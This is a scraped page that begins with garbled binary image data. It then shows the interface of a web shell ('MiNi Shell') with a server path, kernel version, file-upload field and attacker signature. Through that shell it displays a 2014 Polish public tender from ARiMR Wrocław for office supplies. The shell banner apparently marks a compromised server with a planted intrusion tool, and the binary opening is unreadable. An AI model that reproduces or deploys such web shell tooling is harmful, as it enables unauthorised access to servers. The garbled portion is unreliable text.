JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140902/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140902/291316-N-2014.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów biurowych i papierniczych na potrzeby Dolnośląskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa we Wrocławiu</b><br>
<b>Numer ogłoszenia: 291316 - 2014; data zamieszczenia: 02.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 71 3697400, faks 71 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papierniczych na potrzeby Dolnośląskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i rozładunek materiałów biurowych i papierniczych na potrzeby Dolnośląskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa we Wrocławiu. 
Szczegółowy opis przedmiotu zamówienia:
Cienkopis z końcówką fibrową; 4 kolory: niebieski, czarny, zielony - po 200 szt.; czerwony 400 szt.; 1 000; szt.2; Długopis automatyczny z wymiennym wkładem posiadający gumowy uchwyt o ergonomicznej budowie; tusz olejowy nie rozmywa się i nie blaknie; grubość końcówki min. 0,7 mm; grubość linii pisania 0,35 mm; kolor: niebieski.; 2 000; szt.3; Długopis żelowy z gumowym, antypoślizgowym uchwytem; końcówka ze stali nierdzewnej; tusz wysycha natychmiast i nie rozmazuje się, jest odporny na działanie światła, wody oraz innych czynników zewnętrznych, grubość linii pisania min. 0,3 mm, długość linii pisania min. 600 m; kolor: niebieski 1 000 szt., kolor: czarny 400 szt.; 1 400; szt.4; Druk KP, format A6 - zgodny z obowiązującymi normami prawnymi, wykonane z surowców najwyższej jakości na papierze offsetowym lub samokopiującym.; 100; szt.5; Druk KW, format A6 - zgodny z obowiązującymi normami prawnymi, wykonane z surowców najwyższej jakości na papierze offsetowym lub samokopiującym.; 50; szt.6; Dziurkacz jednorazowo dziurkuje min. 25 kartek; wykonany z blachy stalowej, z ogranicznikiem formatu A4, A5, A6, 8 x 8 x 8; z pojemnikiem na ścinki; 50; szt.7; Etykiety samoprzylepne format A4 (210x297mm; cała kartka) - do drukarek atramentowych i laserowych, op. 100 ark.; 30; op.8; Gumka o wysokiej ścieralności, biała, przeznaczona do wymazywania pisma ołówka, wykonana z najwyższej jakości termoplastycznego kauczuku, wymiary ok. 31x23x9 mm.; 500; szt.9; Gumki recepturki, elastyczne, różnokolorowe gumki o średnicy 50 mm 1kg.; 20; op.10; Kalkulator biurowy, 12 pozycyjny ruchomy wyświetlacz, z podwójnym zasileniem; zaokrąglanie wyników, klawisz cofania i podwójnego 0, plastikowa obudowa, plastikowe klawisze, funkcja GT (obliczanie sumy końcowej), minimalne wymiary: 200x150x27mm; 50; szt. 11; Karton archiwizacyjny zbiorczy otwierany z przodu biały o wymiarach 525x338x306 mm, do przechowywania segregatorów o formacie A4 lub kartonowych pojemników składanych; boczne uchwyty ułatwiają przenoszenie puda; miejsca do opisu na bocznych ściankach; możliwość przechowywania 7 segregatorów A4 na 75mm lub 10 segregatorów A4 na 50mm.; 50; szt.12; Klej biurowy w sztyfcie przeznaczony do klejenia papieru, tektury, gwarantujący równomierne i dokładne nanoszenie kleju, nie marszczy papieru, nie zawiera rozpuszczalników, zmywalny wodą - min. 35g.; 600; szt.13; Klipy do dokumentów czarne, rozmiar 51 mm, op. 12 sztuk; 20; op.14; Koperta ochronne z warstwą folii bąbelkowej wewnątrz, białe, samoklejące z paskiem, wymiary wewn: 175x265 mm ; 500; szt.15; Koperta ochronne z warstwą folii bąbelkowej wewnątrz, białe, samoklejące z paskiem, wymiary wewn: 235x340 mm ; 300; szt.16; Koperta C-5 HK klejona na krótkim boku, samoprzylepna z paskiem, klejona na długi m boku, op. 500 szt.; 5; op.17; Koperta C-5 HK klejona na krótkim boku, samoprzylepna z paskiem, klejona na krótkim boku, op. 500 szt.; 5; op.18; Koperta samoprzylepna DIN DL SK z oknem prawym (45x90 mm); opak.: 1 000 szt.; kolor: biały; 30; op.19; Koperta z okienkiem do przechowywania płyt CDiDVD, biała; op. 100 szt.; 30; op.20; Koperta z rozszerzanymi bokami i spodem, samoklejące z paskiem; format B-4 (250x353x38mm),  min. 130g; opak.: 10 szt.; kolor: biały; 100; op.21; Koperta z rozszerzanymi bokami i spodem, samoklejące z paskiem; format E-4 (280x400x40mm),  min. 150g; opak.: 10 szt.; kolor: biały; 100; op.22; Korektor w taśmie  wyposażony w trwałą taśmę korygującą  z ruchomym mechanizmem zabezpieczającym, możliwość natychmiastowego pisania po korygowanej powierzchni;; 40; szt.. 23; Koszulki  A4, przeźroczyste, groszkowe, folia o grubości min. 45 mikronów; op. 100 szt.; 10; op.24; Koszulki  na CDiDVD z możliwością wpięcia do segregatora, op. 10 szt.; 50; op.25; Linijka wykonana z przeźroczystego polistyrenu, dokładna skala 30 cm;; 50; szt.26; Marker  permanentny o grubości 4,5 mm ze ściętą końcówką; kolor: czarny; 100; szt.27; Nożyczki biurowe ze stali nierdzewnej  z ergonomicznym miękkim uchwytem dla prawo i leworęcznych osób do cięcia papieru, kartonu, tektury, zdjęć, etykiet, taśmy itp. ; 50; szt.28; Noże biurowe z ostrzami prowadzonymi w metalowej szynie  wyposażone w niełamliwą obudowę ; rozmiar ostrza 155 x 18 mm (duży nożyk);; 50; szt.29; Ołówek HB z gumką wykonany z żywicy syntetycznej charakteryzującej się wysoką elastycznością z trwałym, nie łamiącym się grafitem;; 600; szt.30; Papier A3 w ryzach; 80 g m2; CIE 161; 20; ryza 31; Papier A4 w ryzach; 80 g m2; CIE 161; 2 000; ryza32; Papier A5 w ryzach; 120 g m2; CIE 161; 200; ryza33; Pinezki tablicowe do tablic korkowych, op. 100 szt.; 200; op.34; Przekładki do segregatora kartonowe o wym. 240 x 105 mm, op. 100 szt.; 10; op.35; Rozszywacz uniwersalny do wszystkich rodzajów zszywek;; 50; szt.36; Segregator A4, wykonany z grubego kartonu z ergonomicznym, solidnym mechanizmem dociskającym, szerokość grzbietu 75 mm, kolory: czerwony, zielony, niebieski, czarny - każdy po 100 szt;; 400; szt.37; Segregator A4, wykonany z grubego kartonu z ergonomicznym, solidnym mechanizmem dociskającym, szerokość grzbietu 50 mm, kolory: czerwony, zielony - każdy po 50 szt;; 100; szt.38; Skoroszyt kartonowy oczkowy, format A4,  przód pełen karton, gramatura: 280 g/m2; kolor: biały;; 2 000; szt.39; Skoroszyt plastikowy sztywny, format A4, przednia okładka przeźroczysta sztywna, druga kolorowa, wykonany z mocnego i sztywnego PCV, wyposażony w papierowy, wysuwany pasek do opisów; 5 kolorów: czarny, czerwony, niebieski, zielony, żółty każdy po 100 szt.;; 500; szt.40; Skoroszyt plastikowy sztywny, format A4 wpinany do segregatora, przednia okładka przeźroczysta sztywna, druga kolorowa, wykonany z mocnego i sztywnego PCV, wyposażony w papierowy, wysuwany pasek do opisów oraz w boczną perforację, umożliwiającą wpięcie do segregatora - 4 kolory: czarny, czerwony, niebieski, zielony - po 150 szt;; 600; szt.41; Spinacz biurowy mały; owalny lub trójkątny; metalowy; kolor: srebrny; wym.: 25-28 mm, op. 100 szt.; 10; op.42; Spray do czyszczenia ekranów LCD TFT i laptopów, nie pozostawia smug, posiada właściwości antystatyczne, nie zawiera alkoholu i jest przebadany dermatologicznie, posiada formułę przyjazną środowisku; poj. min. 250 ml; 100; szt.43; Sprężone powietrze z rurką plastikową, poj. min. 250 ml;; 100; szt.44; Szuflada na dokumenty, wykonana z wytrzymałego plastiku, półki łączone pionowo, przeźroczysta bezbarwna, wym. 250x65x345 mm.; 50; szt.45; Taśma klejąca biurowa przeźroczysta  wykonana z polipropylenu, pokryta emulsyjnym klejem akrylowym, wym. 18mm x 20m; 200; szt.46; Taśma pakowa, przeźroczysta, wymiary: szer.(mm) x dł. (m);  48mm x 66 m.; 50; szt.47; Teczka wiązana, tekturowa; biała, format A4; gramatura kartonu 350 g m2; wyposażona w białą tasiemkę oraz trzy wewnętrzne klapki zabezpieczające dokumenty przed wypadaniem;; 20 000; szt.48; Teczka skoroszytowa tekturowa z plastikowymi wąsami, regulowana szerokość grzbietu 1 - 10 cm; pozwala przechowywać do 800 kartek; ; 1 000; szt.49; Temperówka metalowa; stalowe ostrze mocowane wkrętem, ostrze zapewniające idealnie centralne położenie ołówka podczas temperowania; ; 50; szt. 50; Tusz czarny, pojemność min. 25 ml; ; 10; szt.51; Tusz zielony, wysokiej jakości, na bazie wody, do stempli z gumową lub polimerową płytką stemplującą, pojemność min. 30 ml;; 50; szt.52; Wąsy do skoroszytów; kolor: czarny, czerwony, zielony, niebieski; op. 25 szt.;; 40; op.53; Wkład do przybornika (białe karteczki), kostka nie klejona o wym. 76 x 76 mm, w bloku po 500 kartek.; 50; szt.54; Samoprzylepne karteczki żółte memo, duże wym75x75 mm;; 300; szt.55; Zakładka indeksująca - 4 kolory po 50 karteczek;; 400; kpl.56; Zakreślacz do zaznaczania tekstu na każdym rodzaju papieru, nietoksyczny tusz o wys. trwałości i wydajności, końcówka ścięta 1-5 mm; kolory: żółty, zielony, różowy, fiolet; każdy kolor po 100 szt.;; 400; szt.57; Zszywacz biurowy, metalowy w plastikowej obudowie z funkcją automatycznego zszywania oraz systemem ABS zapobiegającym zacinaniu się zszywek w zszywaczu, na zszywki o wym. 24/6 oraz 26/6;  zszywa min. 30 kartek;; 60; szt.58; Zszywki o wym. 23 10 op. 1000 szt.; 10; op.
Przedmiot zamówienia został również określony szczegółowo w Formularzu ofertowym wraz z  tabelą asortymentowo - cenową stanowiące Załącznik nr 1 i 2 do SIWZ i umowy.
Zamówione towary należy dostarczyć pod adres: Agencja Restrukturyzacji i Modernizacji Rolnictwa, Dolnośląski Oddział Regionalny, ul. Giełdowa 8, 52-438 Wrocław i rozładować do pomieszczeń i w miejsce wskazane przez pracowników Zamawiającego (parter).
Na żądanie Zamawiającego część asortymentu, tj. papier biurowy A4 poz. 31 oraz teczki wiązane poz. 46 - należy dostarczyć pod adres: Biuro Powiatowe Agencji Restrukturyzacji i Modernizacji Rolnictwa, ul. Komuny Paryskiej 72, 50-452 Wrocław i rozładować do pomieszczeń i w miejsce wskazane przez pracowników Zamawiającego (parter)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące posiadania wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach: a)działania siły wyższej lub wystąpienia stanu wyższej konieczności, b)zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe, c)zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia, d)jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego, e)zmianie elementów zamówienia na elementy lepsze lub odpowiedniejsze korzystnych dla Zamawiającego, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa, Dolnośląski Oddział Regionalny, 52-438 Wrocław, ul. Giełdowa 8, sekretariat - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 09:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa, Dolnośląski Oddział Regionalny, 52-438 Wrocław, ul. Giełdowa 8, sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com